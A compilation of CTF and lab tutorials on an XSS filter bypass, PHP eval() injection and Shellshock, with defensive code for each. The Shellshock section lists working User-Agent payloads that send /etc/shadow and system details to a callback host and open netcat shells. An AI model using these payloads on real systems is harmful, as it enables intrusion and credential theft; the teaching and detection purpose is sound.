Bypassing HTML5/Javascript XSS Restrictions

OVERVIEW:

A quick PoC/tutorial on bypassing client-side HTML5/JavaScript XSS filters in Infosec Institute's Level 1 CTF challenge. Full details on the challenge can be found here: http://ctf.infosecinstitute.com/ctf2/. All credits go to [email protected]

STEP 1: Inspect the Site Name element

Since the application encodes the “<” and “>” characters, we first need to check the code to see whether the sanitization happens on the server or on the client. If it is client-side (i.e. HTML5/JavaScript), the user can alter and bypass it. To do this, use any web browser, right-click on the “Site Name” form element and choose “Inspect Element”. This opens the developer tools, which let us edit the element's properties.

STEP 2: Remove client side restrictions

Replace the existing input field with the one below, which increases the maxsize value and drops the attribute that restricts the allowed characters:

<input type="text" placeholder="Name of site" maxsize="100" class="form-control" required="" name="name">

STEP 3: Edit the ex1.js file to remove character encoding

Since the web application also sanitizes the “<” and “>” characters in ex1.js (JavaScript), we need to edit the client-side JavaScript as well. This can be done in the developer tools by clicking the “Sources” tab and editing ex1.js to remove the HTML character encoding from the following two lines:

var siteName = $(".ex1 input[type='text']").val().trim().replace(/</g, "&lt;").replace(/>/g, "&gt;");
var siteURL = $(".ex1 input[type='url']").val().trim().replace(/</g, "&lt;").replace(/>/g, "&gt;");

STEP 4: Enter the XSS payload

After the client-side validation and sanitization have been removed, enter the following payload into the “Site Name” field and click “Submit”.

<script>alert('Ex1')</script>

RESULT:

The result is that our JavaScript alert window was successfully injected into the page once all client-side code had been altered and bypassed. To prevent this type of attack, validation must be done by a server-side component that the user cannot control or edit.
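To make the mitigation concrete, the following added example (not part of the original tutorial) contrasts the browser-side replace() chain from ex1.js, which the user can delete, with output encoding applied when the server renders the submitted value. It uses Python's html.escape as the server-side encoder; the render_site_row() helper and the table layout are assumptions for the example, not the challenge's real code. It also shows that the ex1.js encoder only handles < and >, while the server-side encoder covers &, quotes and apostrophes too.

```python
import html
import re

# The payload used in step 4 of the walkthrough above.
PAYLOAD = "<script>alert('Ex1')</script>"


def client_style_encode(value: str) -> str:
    """Mirror of the replace() chain in ex1.js: only '<' and '>' are encoded.
    Because this runs in the browser, the user can simply remove it."""
    return value.strip().replace("<", "&lt;").replace(">", "&gt;")


def server_side_encode(value: str) -> str:
    """Output encoding on the server: '&', '<', '>', '"' and "'" are all encoded,
    so the value is inert both in element content and inside quoted attributes."""
    return html.escape(value.strip(), quote=True)


def render_site_row(name: str, url: str) -> str:
    """Hypothetical server-side renderer for a submitted site entry.
    The raw form values are encoded here, regardless of what the browser did."""
    return (
        "<tr>"
        f"<td>{server_side_encode(name)}</td>"
        f'<td><a href="{server_side_encode(url)}">link</a></td>'
        "</tr>"
    )


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script_tag(rendered: str) -> bool:
    """Check: does the rendered HTML still contain an un-encoded <script> tag?"""
    return SCRIPT_TAG.search(rendered) is not None


if __name__ == "__main__":
    # What step 3 of the tutorial removes: the browser-side encoding.
    print(client_style_encode(PAYLOAD))
    # What the browser cannot remove: encoding applied when the server renders.
    print(render_site_row(PAYLOAD, "http://example.com/"))
```

Note that encoding makes the URL safe to place inside the href attribute, but it does not validate the URL itself; restricting the scheme to http/https is a separate server-side check.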

Exploiting PHP Eval() Functions

OVERVIEW:

A quick PoC/tutorial on executing arbitrary PHP code via PHP's eval() function in Infosec Institute's Level 2 CTF challenge. Full details on the challenge can be found here: http://ctf.infosecinstitute.com/ctf2/. All credits go to [email protected]

STEP 1: Understanding the use of eval()

Based on the application's behaviour, we can guess that the backend uses code similar to the following to calculate the result:

<?php eval("$num1 $operand $num2;"); ?>

STEP 2: Editing the operand field

Since there appears to be server-side validation preventing non-integer values for $num1 and $num2, we can try editing the operand field instead to get our injected PHP code to run. This can be done in a web browser by right-clicking the element and selecting “Inspect Element”.

STEP 3: Edit the operand field to inject our PHP code

To inject our PHP code, edit the operand field as shown below. The value keeps the original expression syntactically valid, so our code runs without the function producing an error:

<option value=" + 1; phpinfo(); 1 + "> + 1; phpinfo(); 1 + </option>

RESULT:

After clicking Submit, you will notice that our injected PHP function is executed and its output displayed. To prevent this type of attack, eval() should be avoided at all costs, and all user input should be validated and sanitized before it is used.
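The calculator can be written so that no user-controlled string is ever evaluated. The following added example (not the challenge's code, and in Python rather than PHP because the backend above is only a guess) treats the operand as a key into a whitelist of allowed operations and parses the numbers strictly. The injected value from step 3 fails the whitelist check and is never executed. The handle_form() request-handler shape is an assumption for the example.

```python
import operator
import re

# Whitelist: the only operands the calculator accepts, mapped to ordinary functions.
# Any other value, such as "+ 1; phpinfo(); 1 +", is rejected before anything runs.
OPERATORS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
}

INTEGER_RE = re.compile(r"-?\d+")


class InvalidInput(ValueError):
    """Raised for any field that fails validation; nothing is ever evaluated."""


def parse_int(field: str, value: str) -> int:
    """Strict integer parsing, equivalent to the server-side check the
    tutorial observes on $num1 and $num2."""
    value = value.strip()
    if not INTEGER_RE.fullmatch(value):
        raise InvalidInput(f"{field} must be an integer, got {value!r}")
    return int(value)


def calculate(num1: str, operand: str, num2: str) -> float:
    """Compute num1 <operand> num2 from raw form strings without eval()."""
    a = parse_int("num1", num1)
    b = parse_int("num2", num2)
    op = OPERATORS.get(operand)  # exact match only; no stripping or normalisation
    if op is None:
        raise InvalidInput(f"operand must be one of {sorted(OPERATORS)}, got {operand!r}")
    if op is operator.truediv and b == 0:
        raise InvalidInput("division by zero")
    return op(a, b)


def handle_form(form: dict) -> dict:
    """Hypothetical request handler: validate, compute, and return either a result
    or an error message. The operand never reaches an interpreter."""
    try:
        result = calculate(form.get("num1", ""), form.get("operand", ""), form.get("num2", ""))
        return {"result": result}
    except InvalidInput as exc:
        return {"error": str(exc)}


if __name__ == "__main__":
    print(handle_form({"num1": "2", "operand": "+", "num2": "3"}))
    # The operand injected in step 3 is rejected outright.
    print(handle_form({"num1": "2", "operand": "+ 1; phpinfo(); 1 +", "num2": "3"}))
```

The same structure applies in PHP: a lookup of the operand in a fixed array (or a switch over the four allowed strings) and intval() on the numbers removes the need for eval() entirely.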

CVE-2014-6271 Shellshock Exploitation and Remote Shell Tutorial

A quick tutorial on how to exploit Shellshock (CVE-2014-6271) using timing attacks, remote confirmation, and gaining a shell back to the host. CC: [email protected] https://twitter.com/CrowdShield. Download the Pentesterlab Shellshock VM here: https://pentesterlab.com/exercises/cve-2014-6271

Shellshock CGI-BIN Brute Force List:

/
/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php5-cli
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/status
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5
/phppath/cgi_wrapper
/phppath/php

Shellshock User-Agent Strings:

() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=4"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://yourdomain/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 3 && curl http://yourdomain/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=9&?vuln=9"
() { :;}; echo vulnerable 10
() { :;}; wget http://yourdomain/shellshock.txt?vuln=11
() { :;}; curl http://yourdomain/shellshock.txt?vuln=12
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://yourdomain/shellshock.txt?vuln=13;curl http://yourdomain/shellshock.txt?vuln=15;\");'
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
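From the defender's side, every probe in the list above leaves the same marker in the web server log: a User-Agent beginning with the exported-function prefix `() { ... };` followed by the command. The following added example (not part of the original tutorial) parses combined-format access log lines, flags requests whose User-Agent carries that prefix, and pulls out the trailing command, the delay of a timing probe (the sleep 1/3/6 variants) and the host of an outbound curl/wget callback. The sample log lines, IP addresses and the callback.example host are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Apache/nginx "combined" log format. The User-Agent is the final quoted field and is
# captured greedily because Apache writes embedded quotes inside it as \".
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# The Shellshock trigger: a function definition "() { ... }" followed by ";" and a
# trailing command, which vulnerable bash versions executed when importing the variable.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")
SLEEP_RE = re.compile(r"\bsleep\s+(\d+)")
CALLBACK_RE = re.compile(r"://([A-Za-z0-9.\-]+)")


@dataclass
class Finding:
    host: str                    # client IP that sent the probe
    path: str                    # requested path, typically a CGI script
    command: str                 # the command following the function definition
    sleep_seconds: Optional[int] # delay of a timing probe, if any
    callback_host: Optional[str] # host of an outbound curl/wget confirmation, if any


def classify(line: str) -> Optional[Finding]:
    """Return a Finding if the request carries a Shellshock-style User-Agent, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hit = SHELLSHOCK_RE.search(m["ua"])
    if not hit:
        return None
    cmd = hit["cmd"]
    sleep = SLEEP_RE.search(cmd)
    callback = CALLBACK_RE.search(cmd)
    return Finding(
        host=m["host"],
        path=m["path"],
        command=cmd,
        sleep_seconds=int(sleep.group(1)) if sleep else None,
        callback_host=callback.group(1) if callback else None,
    )


def scan_log(lines) -> List[Finding]:
    """Run classify() over an iterable of log lines and keep the hits."""
    return [f for f in (classify(line) for line in lines) if f is not None]


# Constructed sample log (not from the page): one normal request, then a timing probe
# and a callback probe modelled on the User-Agent strings listed above.
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Oct/2014:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"sleep 6 && echo vulnerable 6\\""',
    '198.51.100.9 - - [10/Oct/2014:13:56:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "-" '
    '"() { :;}; /bin/bash -c \\"wget http://callback.example/shellshock.txt?vuln=4\\""',
]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Because CGI exports every request header as an environment variable, the same check should be run over the Referer, Cookie and any other logged headers, not just User-Agent. A timing probe also shows up as response latency matching the requested sleep, so correlating sleep_seconds with the server's response time field (where logged) confirms whether the probe actually executed.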